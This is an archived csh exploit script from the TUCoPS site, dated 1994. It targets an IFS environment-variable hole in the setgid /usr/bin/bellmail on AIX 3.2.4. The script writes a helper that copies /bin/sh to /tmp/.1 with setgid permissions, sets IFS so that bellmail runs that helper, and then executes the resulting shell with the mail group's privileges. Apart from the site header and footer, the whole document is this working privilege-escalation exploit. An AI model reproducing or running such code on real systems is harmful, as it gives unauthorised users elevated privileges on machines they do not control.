TUCoPS :: Unix :: Various Flavours :: bmail-sh.txt

IBM AIX Exploit hole in /usr/bin/bellmail 

#!/bin/csh
# Written by A-Flat - June 30, 1994    

# Exploit IFS hole in /usr/bin/bellmail to give us GID=mail.   
# Tested on AIX 3.2.4 

# -r-sr-sr-x   1 root     mail       30340 Jun 18 1993  /usr/bin/bellmail
# sum:  47709    30 /usr/bin/bellmail

cat > usr << EOF
IFS=" "
export IFS
/bin/cp /bin/sh /tmp/.1
/bin/chmod 2777 /tmp/.1
EOF
chmod 755 usr
setenv IFS /
echo " "
echo "At the ? prompt, send mail to a user (m username)"
echo " "
bellmail
unsetenv IFS
rm -f usr
echo " "
echo "Executing SGID mail shell."
/tmp/.1
rm -f /tmp/.1

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH